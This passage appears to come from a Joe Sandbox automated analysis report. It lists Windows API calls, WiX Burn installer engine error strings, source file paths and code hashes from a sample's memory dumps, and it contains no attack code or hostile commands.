                                                                                                                                                                  • Failed to set system folder variant value., xrefs: 00919926
                                                                                                                                                                  • Failed to get 64-bit system folder., xrefs: 009198B8
                                                                                                                                                                  • Failed to get 32-bit system folder., xrefs: 009198D7, 009198FF
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 00919938
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcess
                                                                                                                                                                  • String ID: Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 896058289-2644686703
                                                                                                                                                                  • Opcode ID: d185f572d7cdf3774612c6b52f15d0afb1fe86b8c9fff66d8107284846483d6e
                                                                                                                                                                  • Instruction ID: 660b39ead81a0ca3b0bde593812e03f784789e649c89554d0984238a52f25221
                                                                                                                                                                  • Opcode Fuzzy Hash: d185f572d7cdf3774612c6b52f15d0afb1fe86b8c9fff66d8107284846483d6e
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B210831F8072CB6DB32A7558C1BFDF69B8AF84B50F1141A9B544BA2C1E6B09BC0D691
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • CreateWellKnownSid.ADVAPI32(001F01FF,00000000,00000000,?,00000044,00000001,00000000,0092D5FB,?,?,?,0092D2F1,001F01FF,0092D617,00000000,00000000), ref: 0092C5A2
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0092D2F1,001F01FF,0092D617,00000000,00000000,?,0092D5FB,0000001A,001F01FF,?,00000000,00000000,?), ref: 0092C5AC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                                                                  • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 2186923214-3368738088
                                                                                                                                                                  • Opcode ID: a12bdc5bdb48f3141f4c5c18df613edeb5cbd3f1e499886ae136b075e63c2ed1
                                                                                                                                                                  • Instruction ID: 68341ab5740730bc4fe477b113c04f998d544a2691cfbdd0ca9a447300eff84d
                                                                                                                                                                  • Opcode Fuzzy Hash: a12bdc5bdb48f3141f4c5c18df613edeb5cbd3f1e499886ae136b075e63c2ed1
                                                                                                                                                                  • Instruction Fuzzy Hash: DF1157B3B4533473E320665A6C4AF9F6A5CCFC5B60F120416BE08BB282E1B4DC8082F0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00978D33
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Already processed this value.$Failed to allocate value.$Failed to get value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                  • API String ID: 3341692771-474062544
                                                                                                                                                                  • Opcode ID: 030e27beb14e4ba674089c534660df8ef4ff388ef43283e0e4680d1b022c1930
                                                                                                                                                                  • Instruction ID: 0a55b62a25a5fdf97c5d14c243870f04db92d972216cde5f7f18ebe72f706666
                                                                                                                                                                  • Opcode Fuzzy Hash: 030e27beb14e4ba674089c534660df8ef4ff388ef43283e0e4680d1b022c1930
                                                                                                                                                                  • Instruction Fuzzy Hash: 65113A63BC0718B7E73226448C4EFBFA96CDFD2B64F158024BB087A1C1AAB14D0052F4
                                                                                                                                                                  APIs
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00916C5C,00000000,00000000,?,?,00000000,00000000), ref: 009724FE
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp, xrefs: 00972567
                                                                                                                                                                  • Failed to copy shell folder path: %ls, xrefs: 00972539
                                                                                                                                                                  • Failed to get folder path for CSIDL: %d, xrefs: 0097250D
                                                                                                                                                                  • Failed to backslash terminate shell folder path: %ls, xrefs: 00972558
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FolderPath
                                                                                                                                                                  • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to get folder path for CSIDL: %d$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp
                                                                                                                                                                  • API String ID: 1514166925-3657258693
                                                                                                                                                                  • Opcode ID: 86bc11a81e0ccb2a5347687e1670219806d718dd5136dea95372db3c403f39ab
                                                                                                                                                                  • Instruction ID: a2d66b381e67cacff1c7d9a0824422bd75900fe2acb050b37ac99af1e0dc5724
                                                                                                                                                                  • Opcode Fuzzy Hash: 86bc11a81e0ccb2a5347687e1670219806d718dd5136dea95372db3c403f39ab
                                                                                                                                                                  • Instruction Fuzzy Hash: CB117B72741728B7E721A7648C46FAF7BACDB85B54F114151B908BB1C1D6B0DD0446A1
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091174A: WaitForSingleObject.KERNEL32(?,0093EA2A,00000000,?,0093EA2A,?,000000FF), ref: 00911756
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(000000FF,00000000,000000FF,?,00916CF2), ref: 00976944
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0097694E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeErrorExitLastObjectSingleThreadWait
                                                                                                                                                                  • String ID: Failed to get thread return code.$Failed to wait for thread to complete.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\thrdutil.cpp
                                                                                                                                                                  • API String ID: 113644094-2957177065
                                                                                                                                                                  • Opcode ID: fc5958138ab869a1067ad1a366b01bf0a35704bfcd8268e5f84773fe31627d85
                                                                                                                                                                  • Instruction ID: 51186d38dbc3c84a9e750d3072ab1da5834698e8a23c297fa6210e8eb5e3e26c
                                                                                                                                                                  • Opcode Fuzzy Hash: fc5958138ab869a1067ad1a366b01bf0a35704bfcd8268e5f84773fe31627d85
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F01C433B80724B7DB312A558C0AFAF2D589B96BA0F058115FF1CBE291E271985092D1
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000,?,0091805E,?,?,?,?,?,?,?), ref: 009333EB
                                                                                                                                                                  • GetLastError.KERNEL32(?,0091805E,?,?,?,?,?,?,?), ref: 009333F5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                  • String ID: Failed to set log finished event.$Failed to wait for elevated logging thread.$d:\a\wix4\wix4\src\burn\engine\core.cpp
                                                                                                                                                                  • API String ID: 3848097054-817072838
                                                                                                                                                                  • Opcode ID: fba28045970f8f4dc272fc9827cd360357ed58c4ca81c258fccf8955928e4497
                                                                                                                                                                  • Instruction ID: bf4611562b14b84acad533cb5533aaba0690417be4fecdc004729fb8cf5c2913
                                                                                                                                                                  • Opcode Fuzzy Hash: fba28045970f8f4dc272fc9827cd360357ed58c4ca81c258fccf8955928e4497
                                                                                                                                                                  • Instruction Fuzzy Hash: 3401F973BC063573D22266245C0FF9BE94D9B80BA0F118221FE14BA2E1A2A19C5186E0
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0093EA2A,00000000,?,0093EA2A,?,000000FF), ref: 00911756
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectSingleWait
                                                                                                                                                                  • String ID: Abandoned wait for single object.$Failed to wait for single object.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\apputil.cpp
                                                                                                                                                                  • API String ID: 24740636-2056904685
                                                                                                                                                                  • Opcode ID: f88076703c3a58921500d7ff02aa6c73932d7cdfc4572435bf836b9adc27df23
                                                                                                                                                                  • Instruction ID: 86898ce47b3a21c57869bf79a54d5677b103374d00677070f9e78b34400b3875
                                                                                                                                                                  • Opcode Fuzzy Hash: f88076703c3a58921500d7ff02aa6c73932d7cdfc4572435bf836b9adc27df23
                                                                                                                                                                  • Instruction Fuzzy Hash: DD01DF27B4022C72D72011569C89FFB695DDB88BB0F118865FF08EB3C191288C8052E4
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00916BE8
                                                                                                                                                                  • DeleteCriticalSection.KERNEL32(00000000,000000B0,00000000,000000B0,00000000,00000000,000000FF,000000B0,000000B0,00000000,00000010,00000000), ref: 00916DBC
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00916DCB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCriticalDeleteErrorHandleLastSection
                                                                                                                                                                  • String ID: Failed to create semaphore for queue.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 596325006-2650474371
                                                                                                                                                                  • Opcode ID: 62db2e0f0d2749251f02b8d811684b4d0c557929f881c98795e13a3052fdba67
                                                                                                                                                                  • Instruction ID: 454791f5c897c16e8927a149fa42d3637f4dd57edda2b2893470fb366ad4c335
                                                                                                                                                                  • Opcode Fuzzy Hash: 62db2e0f0d2749251f02b8d811684b4d0c557929f881c98795e13a3052fdba67
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C019273F40329A7DB119794DC4AFDDB67CAB48315F050055FA01BA1E1D2759D80CBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 00936300
                                                                                                                                                                  • CoUninitialize.OLE32(?,00939CE0,?,?), ref: 0093636B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 00936347
                                                                                                                                                                  • Failed to initialize COM., xrefs: 0093630C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\elevation.cpp, xrefs: 0093631E, 00936359
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$d:\a\wix4\wix4\src\burn\engine\elevation.cpp
                                                                                                                                                                  • API String ID: 3442037557-3194279326
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A68EAB5A,?,?,00000000,0097D0D5,000000FF,?,0095E66A,0095E74E,?,0095E63E,00000000), ref: 0095E6C3
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0095E6D5
• FreeLibrary.KERNEL32(00000000,?,?,00000000,0097D0D5,000000FF,?,0095E66A,0095E74E,?,0095E63E,00000000), ref: 0095E6F7
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• __alloca_probe_16.LIBCMT ref: 00966165
• __alloca_probe_16.LIBCMT ref: 0096622E
• __freea.LIBCMT ref: 00966295
  • Part of subcall function 0095F62C: HeapAlloc.KERNEL32(00000000,00961970,?,?,00961970,00000220,?,00000000,?), ref: 0095F65E
• __freea.LIBCMT ref: 009662A8
• __freea.LIBCMT ref: 009662B5
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 1096550386-0
APIs
• GetLastError.KERNEL32 ref: 0092E17D
  • Part of subcall function 00975E1B: GetLastError.KERNEL32(?,?,0092E0CE,?,00000003,?,?), ref: 00975E3B
Strings
• Failed to get certificate public key identifier., xrefs: 0092E1AD
• Failed to read certificate thumbprint., xrefs: 0092E165
• Failed to find expected public key in certificate chain., xrefs: 0092E122
• d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 0092E134, 0092E1A1, 0092E1A7, 0092E1BB
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$d:\a\wix4\wix4\src\burn\engine\cache.cpp
• API String ID: 1452528299-112932794
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID: %lu.%lu.%lu.%lu$Failed to allocate and format the version string.$Failed to allocate memory for Verutil version from QWORD.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\verutil.cpp
• API String ID: 1357844191-3295944732
APIs
• GetLastError.KERNEL32(00000000,00000005,00000000,?,00000000,?,?,00977C49,?,00978702,?,00000000,HEAD,00000000,00000000,00978702), ref: 0097BC0A
• GetLastError.KERNEL32(00000000,00000000,00000000,?,?,00977C49,?,00978702,?,00000000,HEAD,00000000,00000000,00978702,00000000,?), ref: 0097BC56
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: ErrorLast
• String ID: Failed to get content length string for internet file handle$Failed to parse size for internet file handle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\inetutil.cpp
• API String ID: 1452528299-1743952032
APIs
• EnterCriticalSection.KERNEL32(?), ref: 00955061
• LeaveCriticalSection.KERNEL32(?), ref: 009550E8
Strings
• Engine is active, cannot change engine state., xrefs: 00955079
• d:\a\wix4\wix4\src\burn\engine\externalengine.cpp, xrefs: 0095508B
• Failed to set feed download URL., xrefs: 009550BC
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Engine is active, cannot change engine state.$Failed to set feed download URL.$d:\a\wix4\wix4\src\burn\engine\externalengine.cpp
• API String ID: 3168844106-105427012
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0091A9DA
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0091AA62
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 0091AA40
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091AA14
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091AA52
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1616145386
                                                                                                                                                                  • Opcode ID: 2faedbff6f91abea19677288bcc5f2e03b777c8ae396eda67e9d2a7439c6e45c
                                                                                                                                                                  • Instruction ID: ea199a19eeecc70c5eed9245a9e214bb20e60e5ed733eb46ac9376f71d8b8c2b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2faedbff6f91abea19677288bcc5f2e03b777c8ae396eda67e9d2a7439c6e45c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C01C832B8222CBBCF215F40CD09FDE3A69AF14765F018150FA04AA1A1D775DD90DBD5
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0091A811
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0091A896
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as numeric for variable: %ls, xrefs: 0091A874
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 0091A84B
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091A886
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
